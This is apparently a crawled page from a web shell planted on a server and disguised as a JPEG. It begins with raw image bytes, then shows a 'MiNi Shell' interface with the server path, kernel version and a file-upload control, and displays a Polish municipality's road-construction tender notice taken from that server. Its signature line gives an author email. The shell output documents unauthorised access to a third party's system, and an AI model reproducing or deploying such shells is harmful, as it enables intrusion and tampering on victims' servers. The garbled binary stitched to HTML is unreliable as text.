JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221220/0050609901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa dróg gminnych nr 191247C Szczkówek-Kazanki, nr 191206C Szczkówek - Ciepliny, nr 191250C Szczkówek - Szczkowo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IZBICA KUJAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866850</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marszałka Pilsudskiego 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Izbica Kujawska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-865</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">542865009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@izbicakuj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.izbicakuj.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa dróg gminnych nr 191247C Szczkówek-Kazanki, nr 191206C Szczkówek - Ciepliny, nr 191250C Szczkówek - Szczkowo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99f1dc66-7f96-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00506099</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031331/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Rozbudowa dróg gminnych nr 191247C Szczkówek-Kazanki, nr 191206C Szczkówek-Ciepliny, nr 191250C Szczkówek-Szczkowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.izbicakuj.pl/index.php?id=23 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu:<br/>• miniPortalu który dostępny jest pod adresem: https://miniportal.uzp.gov.pl,<br/>• ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal lub<br/>• poczty elektronicznej przetargi@izbicakuj.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKLP.271.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest rozbudowa dróg gminnych nr 191247C Szczkówek-Kazanki, nr 191206C Szczkówek-Ciepliny, nr 191250C Szczkówek-Szczkowo.<br/><br/>Zakres inwestycji obejmuje:<br/>rozbudowy obejmuje następujące prace do wykonania:<br/>•	wykonanie robót ziemnych,<br/>•	rozbudowę dróg gminnych,<br/>•	przebudowę istniejących zjazdów indywidualnych,<br/>•	budowę zjazdów indywidualnych,<br/>•	budowę poboczy z mieszanki optymalnej,<br/>•	wykonanie humusowania nawierzchni i przyległych terenów w celu odpowiedniego odwodnienia korpusu drogowego,<br/>•	wykonania oznakowania pionowego oraz poziomego zgodnie z zatwierdzonym projektem organizacji ruchu. <br/><br/>Podstawowe parametry techniczne:<br/>Droga gminna nr 191206C:<br/>•	nawierzchnia – bitumiczna,<br/>•	klasa drogi – D,<br/>•	kategoria ruchu – KR1,<br/>•	szerokość drogi – 3,5 m (5,0 w miejscu mijanki),<br/>•	długość drogi 2435 mb,<br/>•	spadek poprzeczny drogi 2,0%,<br/>•	spadek poprzeczny pobocza 8,0%.<br/><br/>Droga gminna nr 191247C:<br/>•	nawierzchnia – bitumiczna,<br/>•	klasa drogi – D,<br/>•	kategoria ruchu – KR1,<br/>•	szerokość drogi – 3,5 m (5,0 w miejscu mijanki),<br/>•	długość drogi 2078 mb,<br/>•	spadek poprzeczny drogi 2,0%,<br/>•	spadek poprzeczny pobocza 8,0%.<br/><br/>Droga gminna nr 191250C:<br/>•	nawierzchnia – bitumiczna,<br/>•	klasa drogi – D,<br/>•	kategoria ruchu – KR1,<br/>•	szerokość drogi – 3,5 m (5,0 w miejscu mijanki),<br/>•	długość drogi 1208 mb,<br/>•	spadek poprzeczny drogi 2,0%,<br/>•	spadek poprzeczny pobocza 8,0%.<br/><br/>Konstrukcja nawierzchni:<br/>Konstrukcja jezdni w miejscu istniejącej nawierzchni z kruszywa – poszerzenie<br/>Warstwa ścieralna	AC11S 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,5kg/m2	-<br/>Warstwa wiążąca	AC 11W 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,8kg/m2	-<br/>Warstwa podbudowy	Kruszywo łamane twarde	20 cm<br/>Warstwa stabilizacji	Stabilizacja gruntu cementem Rm 5,0MPa	15 cm<br/>Warstwa odsączająca	Piasek średni	15 cm<br/>RAZEM 56 cm<br/><br/>Konstrukcja jezdni w miejscu istniejącej nawierzchni z kruszywa<br/>Warstwa ścieralna	AC11S 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,5kg/m2	-<br/>Warstwa wiążąca	AC 11W 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,8kg/m2	-<br/>Warstwa podbudowy	Kruszywo łamane twarde	20 cm<br/>RAZEM 26 cm<br/><br/>Konstrukcja mijanki w miejscu istniejącej nawierzchni z kruszywa - poszerzenie<br/>Warstwa ścieralna	AC11S 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,5kg/m2	-<br/>Warstwa wiążąca	AC 11W 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,8kg/m2	-<br/>Warstwa podbudowy	Kruszywo łamane twarde 0/31,5	20 cm<br/>Warstwa stabilizacji	Stabilizacja gruntu cementem Rm 5,0MPa	15 cm<br/>Warstwa odsączająca	Piasek średni	15 cm<br/>RAZEM 56 cm<br/><br/>Konstrukcja mijanki w miejscu istniejącej nawierzchni z kruszywa<br/>Warstwa ścieralna	AC11S 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,5kg/m2	-<br/>Warstwa wiążąca	AC 11W 50/70	3 cm<br/>Skropienie	Emulsja asfaltowa C 60 B3 ZM 0,8kg/m2	-<br/>Warstwa podbudowy	Kruszywo łamane twarde	20 cm<br/>RAZEM 26 cm<br/><br/>Konstrukcja pobocza wzmocnionego<br/>Warstwa ścieralna	Beton C30/37 zbrojony włóknami	15 cm<br/>Podbudowa pomocnicza	Chudy beton	10 cm<br/>Podbudowa zasadnicza	Kruszywo łamane twarde 0/31,5	20 cm<br/>RAZEM 45 cm<br/><br/>Konstrukcja chodnika<br/>Warstwa ścieralna	Kostka betonowa „szara cegiełka”	8 cm<br/>Podsypka	Podsypka cem.-piaskowa	5 cm<br/>Warstwa podbudowy	Kruszywo łamane twarde 0/31,5	10 cm<br/>Warstwa stabilizacji	Stabilizacja gruntu cementem Rm 2,5MPa	15 cm<br/>Nasyp	Piasek średni	50 cm<br/>RAZEM 88 cm<br/><br/>UWAGA! Nie dopuszcza się wykonania stabilizacji gruntu cementem metodą „in situ”.<br/><br/>Obramowanie nawierzchni:<br/>•	obrzeże betonowe 8x30x100cm po zewnętrznej stronie chodnika/peronu<br/>•	krawężnik 15x30x100cm; 15/22x100cm; w ciągu chodnika/peronu, który przylega do nawierzchni dróg gminnych w miejscu peronów autobusowych.<br/>Elementy betonowe należy ustawić na ławie betonowej z oporem z betonu C12/15.<br/><br/>Drogi gminne zostały zaprojektowane jako odcinki proste z łukami poziomymi o promieniu 6,50m – 500m. Wszelkie wyokrąglenia zjazdów indywidualnych oraz publicznych wykonano poprzez promień 5,0m.<br/><br/>W celu poprawnego odwodnienia korpusu dróg gminnych woda opadowa oraz roztopowa zostanie zagospodarowana w obrębie istniejących pasów drogowych.<br/><br/>Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do:<br/>•	opracowania przed rozpoczęciem robót projektów tymczasowej organizacji ruchu na czas realizacji robót prowadzonych w pasie drogowym oraz uzyskania zatwierdzenia przez organ zarządzający ruchem;<br/>•	wprowadzenia stałych organizacji ruchu zgodnie z zatwierdzonymi projektami.<br/><br/>Wykonawca w ramach przedmiotu zamówienia zobowiązany jest wystąpić do Kujawsko-Pomorskiego Wojewódzkiego Konserwatora Zabytków z wnioskiem o pozwolenie na prowadzenie wskazanych w decyzji nr ZAR/72/2022 z dnia 22 kwietnia 2022 r. wydanej przez Kujawko-Pomorskiego Wojewódzkiego Konserwatora Zabytków badań archeologicznych.<br/>Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do oznakowania terenu budowy, m.in. umieszczenie tablicy informacyjnej wynikającej z ustawy Prawo budowlane, oraz 1 szt. tablicy informacyjnej o dofinansowaniu projektu zawierającej treść uzgodnioną z Zamawiającym. <br/><br/>2. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa – stanowiąca załącznik nr 4, 5, 6, 7, 8 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie kierował się następującymi kryteriami, z przypisaniem im odpowiednio wag:<br/><br/>L.p	Kryterium	Znaczenie procentowe kryterium<br/>1	Cena oferty 60%<br/>2	Okres gwarancji i rękojmi	40%<br/>Łącznie	100%<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku.<br/><br/> Przyznanie ilości punktów ofertom będzie odbywać się wg poniższych zasad: <br/>Nr kryterium	Wzór<br/>1	Cena - C<br/>Liczba punktów = ( Cmin/Cof) x waga <br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof- cena podana w ofercie <br/>2	Okres gwarancji i rękojmi - G <br/>Liczba punktów = ( Gof/Gmax) x waga<br/>gdzie:<br/>- Gof - podany w ofercie okres gwarancji i rękojmi<br/>- Gmax - najwyższy spośród wszystkich ofert okres gwarancji i rękojmi<br/>Punkty za kryterium okres gwarancji i rękojmi zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego ilości miesięcy określonej w formularzu ofertowym przewidziany na okres gwarancji dla przedmiotu zamówienia w przedziale od 36 do 84 miesięcy.<br/>W trakcie oceny poszczególnych ofert, zostaną wyliczone punkty wg poniższego wzoru:<br/>Px= Cx + Gx <br/>Px Łączna ilość punktów uzyskanych przez badana ofertę<br/>x nr badanej oferty<br/><br/>W toku oceny ofert Zamawiający zastosuje zaokrąglenie wszystkich wyników do dwóch miejsc po przecinku. <br/>4. Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryterium – „cena” oraz „ okres gwarancji i rękojmi ”) zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane, zgodnie z ilością uzyskanych punktów. <br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny. <br/><br/>6. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do przygotowania oferty zaleca się skorzystanie z Formularza oferty stanowiącego załącznik Nr 1 do SWZ. W przypadku<br/>gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza oferty, oferta powinna zawierać<br/>wszystkie wymagane we wzorze informacje.<br/>2.Wykonawca dołącza do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu oświadczenie, o którym mowa w art.<br/>125 ust. 1 PZP, tj. o nie podleganiu wykluczeniu z postępowania– według wzoru stanowiącemu załącznik nr 2 do SWZ, w<br/>zakresie wskazanym przez Zamawiającego.<br/>3. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>4. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu<br/>5.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w ust. 2, składa<br/>każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia stanowi Załącznik nr 2 do<br/>SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP nazwa Zamawiającego: jr60fdx35d/skrytka i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-09 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Poza ustawowe podstawy wykluczenia. Zamawiający wykluczy z postępowania Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com